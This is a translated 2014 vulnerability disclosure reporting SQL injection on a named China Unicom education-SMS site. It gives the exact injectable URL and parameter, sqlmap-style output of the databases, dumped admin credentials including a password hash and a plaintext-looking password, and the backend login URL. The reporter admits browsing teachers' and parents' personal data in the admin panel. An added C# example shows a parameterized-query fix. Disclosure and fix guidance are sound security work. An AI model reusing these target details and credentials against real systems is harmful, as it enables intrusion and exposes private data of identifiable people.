SQL injection on a China Unicom site leads to user information leak

Vulnerability details

Disclosure status:

2014-05-21: Details reported to the vendor, awaiting vendor handling
2014-05-26: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

A China Unicom site has SQL injection. I got into the admin backend and had a look, didn't do anything bad. There is an upload point, but I didn't test it~~
I hear the rank given for China Unicom vulnerabilities is never high~~ why is that~?

Detailed description:

There is information on quite a few teachers, including principals. Mom no longer has to worry about my studies~

Every day administrators and teachers send quite a few SMS messages through this platform~~

0x01: This is the injection point. I didn't look for any others, and I'd guess there is no shortage of them: http://jxt.yb10010.com/Public/ShowDetail.aspx?LB=2&ID=267, the ID parameter is injectable

[Screenshot: 1.png]



0x02: Databases

available databases [6]:
[*] jxt
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb



0x03: Tables in jxt:

Database: jxt
[122 tables]



0x04: Picked a few tables likely to hold admin accounts and dumped them:

Database: jxt
Table: dbo.admin
[1 entry]
+----+----------+------------------+------------------+
| ID | UserName | Password         | RndPassword      |
+----+----------+------------------+------------------+
| 13 | admin    | 7a57a5a743894a0e | r84y6115O3q4tQFJ |
+----+----------+------------------+------------------+

Database: jxt
Table: dbo.A_S_zhu
[1 entry]
+-------+-------+-----------+--------+
| Js_ID | zh_ID | mma       | Zhming |
+-------+-------+-----------+--------+
| 1     | 1     | ybltadmin | admin  |
+-------+-------+-----------+--------+



0x05: Backend address: http://jxt.yb10010.com/Public/JxtLoginS.aspx

I went in and had a look, and saw a great many teachers' and parents' names, phone numbers and SMS contents... There is also a place to upload files, but I didn't test it.

[Screenshot: parent information]

[Screenshot: teacher information]



Proof of vulnerability:

Same as above

Fix:

Filter the input
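The fix line above is just "filter". As an added example (not the site's code), here is the ASP.NET pattern that makes a query-string ID injectable, beside a hardened version that validates the type and binds the values as typed SqlParameters; the table and column names (Article, Title, Body) are assumed for illustration.

```csharp
// Added example, not code from jxt.yb10010.com. Data-access helper for a
// ShowDetail-style page that reads LB and ID from the query string and queries
// SQL Server. Table/column names are assumed for illustration.
using System;
using System.Data;
using System.Data.SqlClient;

public static class ShowDetailRepository
{
    // BEFORE (the pattern behind the report): the raw request values are
    // concatenated into the statement, so whatever text arrives in the ID
    // parameter is executed as part of the SQL.
    public static DataTable LoadVulnerable(SqlConnection conn, string lb, string id)
    {
        string sql = "SELECT Title, Body FROM Article WHERE LB=" + lb + " AND ID=" + id;
        using (var cmd = new SqlCommand(sql, conn))
        using (var adapter = new SqlDataAdapter(cmd))
        {
            var table = new DataTable();
            adapter.Fill(table);
            return table;
        }
    }

    // AFTER: reject anything that is not an integer up front, then bind the
    // values as typed parameters so the driver sends them as data, never as
    // SQL text. No escaping or blacklist "filtering" is involved.
    public static DataTable LoadSafe(SqlConnection conn, string lb, string id)
    {
        if (!int.TryParse(lb, out int lbValue) || !int.TryParse(id, out int idValue))
            throw new ArgumentException("LB and ID must be integers");

        const string sql = "SELECT Title, Body FROM Article WHERE LB=@LB AND ID=@ID";
        using (var cmd = new SqlCommand(sql, conn))
        using (var adapter = new SqlDataAdapter(cmd))
        {
            cmd.Parameters.Add("@LB", SqlDbType.Int).Value = lbValue;
            cmd.Parameters.Add("@ID", SqlDbType.Int).Value = idValue;
            var table = new DataTable();
            adapter.Fill(table);
            return table;
        }
    }
}
```

The database list in 0x02 (msdb, model and tempdb enumerable from a content page) also suggests the application's SQL login had far more privilege than it needed; parameterization closes the injection, and a least-privileged login limits what any remaining bug can read.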

Information leaks are no small matter; I hope this is taken seriously~~

Copyright notice: when reposting, please credit the source PythonPig@乌云


Vulnerability response

Vendor response:

Hazard level: No impact, vendor ignored

Ignored at: 2014-05-21 10:54

Vendor reply:

Latest status:

2014-05-26: CNVD confirmed and reproduced the described situation; transferred to CNCERT to coordinate notification and handling with China United Network Communications Group Co., Ltd.


Vulnerability rating: